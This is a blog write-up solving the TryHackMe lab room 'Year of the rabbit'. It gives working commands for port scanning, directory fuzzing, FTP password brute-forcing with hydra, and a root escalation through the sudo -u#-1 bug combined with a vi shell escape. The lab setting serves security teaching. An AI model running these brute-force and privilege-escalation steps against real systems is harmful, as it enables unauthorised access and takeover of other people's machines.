Year of the rabbit
In this post, we will look into the room “Year of the rabbit” from TryHackMe, which can be found on https://tryhackme.com
So as always let’s start with some port scanning:
nmap -sV -A $IP
-A – aggressive scan – basically it runs scripts for common things so you can better understand what you can find useful and what is useless.
-sV – version detection – great for searching exploits related to that version of the running services
Now let’s see the output:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 03:41 EDT Nmap scan report for 10.10.250.190 Host is up (0.059s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) | 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) | 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) |_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Apache2 Debian Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.72 seconds
Anonymous ftp isn’t allowed so we will enumerate the webserver. We fire up gobuster with the following commands:
gobuster dir -u $IP -w /usr/share/wordlists/dirb/common.txt
dir – set the mode to directory discovering/fuzzing
– u – used for url
-w the path to the wordlist
Now we need to wait for gobuster to fuze the webserver and then we can check the output:
2020/08/09 03:44:16 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.hta (Status: 403) /assets (Status: 301) /.htaccess (Status: 403) /index.html (Status: 200) /server-status (Status: 403) =============================================================== 2020/08/09 03:44:44 Finished ===============================================================
No interesting directories so i went thru all of them manually just to see. Then in assets i found 2 interesting things:
The first one is the popular meme song “Never gonna give you up” but the style.css is the interesting part of this directory. When we open the file we see an interesting comment:
/* Nice to see someone checking the stylesheets. Take a look at the page: /**************.php */
When i opened the page i was redirected to youtube so i fired up burp to see what’s going on in the php file. For burp we need to first set the proxy in firefox. This can be done by going into Preferences > General (scroll to the bottom) > Network Settings > Advanced and then fill this information:
Then you just press OK and open up Burp. Now try to go into the php file and see the response:
GET /intermediary.php?hidden_directory=/******** HTTP/1.1 Host: 10.10.250.190 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 DNT: 1
You can then switch back to no-proxy and go into the hidden directory. We see a png file that we can download from the webserver. We use the command:
Now let’s first use strings for the image. We type:
And BOOM we can see there is a hidden message:
Eh, you've earned this. Username for FTP is ftpuser One of these is the password:
Then we can forward the output into a file so we can use hydra and bruteforce the ftp:
strings Hot_Babe.png > pass.txt
We open the pass.txt with mousepad so we can delete everything expect the passwords. Then we open hydra and type the following command:
hydra -l ftpuser -P pass.txt ftp://$IP
And voila we got the password now we can login. We see a file named Eli’s_Creds.txt that we can download. We use the command “get” and the filename. Then when i used cat to see the file i was amazed by this. *i’m pasting part of the content of the file*:
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
So i just pasted it in google and found that this is brainfuck language. So i used a website to decrypt it and BOOM we have a username and password. Now we can use this info for ssh.
We see a message from gwendoline about a s3cr3t directory. We can use the command “locate” to find it.
locate s3cr3t #output /usr/games/s3cr3t /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! /var/www/html/sup3r_s3cr3t_fl4g.php
Okay so now we can go and cat the secret message. When we do this we see gwendoline’s password that we can use to ssh with. Let’s do this. Now we can cat the user.txt flag and paste it in tryhackme.
For the root i tried with sudo -l to see what we can do and i saw that vi can be used but not with the gtfobins commands. So then i found a sudo bug that if you specify a user that doesn’t exit it gives you root. Idk why it’s working like that but let’s try this. We type:
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Vi will open so we need to press “:” and then type “!/bin/sh” and voila we got root. Now we can cat the root.txt file.